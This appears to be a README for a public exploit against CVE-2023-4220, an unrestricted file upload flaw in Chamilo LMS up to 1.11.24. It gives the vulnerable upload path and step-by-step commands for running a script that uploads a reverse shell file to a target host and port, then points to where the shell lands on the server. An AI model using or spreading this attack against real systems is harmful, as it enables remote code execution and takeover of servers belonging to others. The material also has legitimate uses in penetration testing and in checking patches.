Share
## https://sploitus.com/exploit?id=4CABC303-DBB4-5F0E-9950-AB48D3771B2A
# Chamilo-LMS-CVE-2023-4220-Exploit
This is an Exploit for Unrestricted file upload in big file upload functionality in Chamilo-LMS for this location `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24, and Attackers can obtain remote code execution via uploading of web shell. Then it will allows arbitrary files to be uploaded to /main/inc/lib/javascript/bigupload/files directory.

# Vulnerability POC
-You Can at first run the exploit to know how to use it like that:
```ruby
chmod +x CVE-2023-4220.sh
./CVE-2023-4220.sh
```
  ![1](https://github.com/Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit/assets/60154552/ba4eb2fc-a36b-48df-8043-061214cb62cc)
-Then you need to enter the requeierd inputs like that: 
```ruby
~$ ./CVE-2023-4220.sh -f reverse_file -h host_link -p port_in_the_reverse_file
```
 ![11](https://github.com/Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit/assets/60154552/ae4d2b5b-d401-4bb1-9ddc-725f039a7650)
-Here we can found the uploaded file in the server
```ruby
http://target.test/main/inc/lib/javascript/bigupload/files/
```
![5](https://github.com/Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit/assets/60154552/7c1f1353-5a83-49e2-9803-d015c5cc72c8)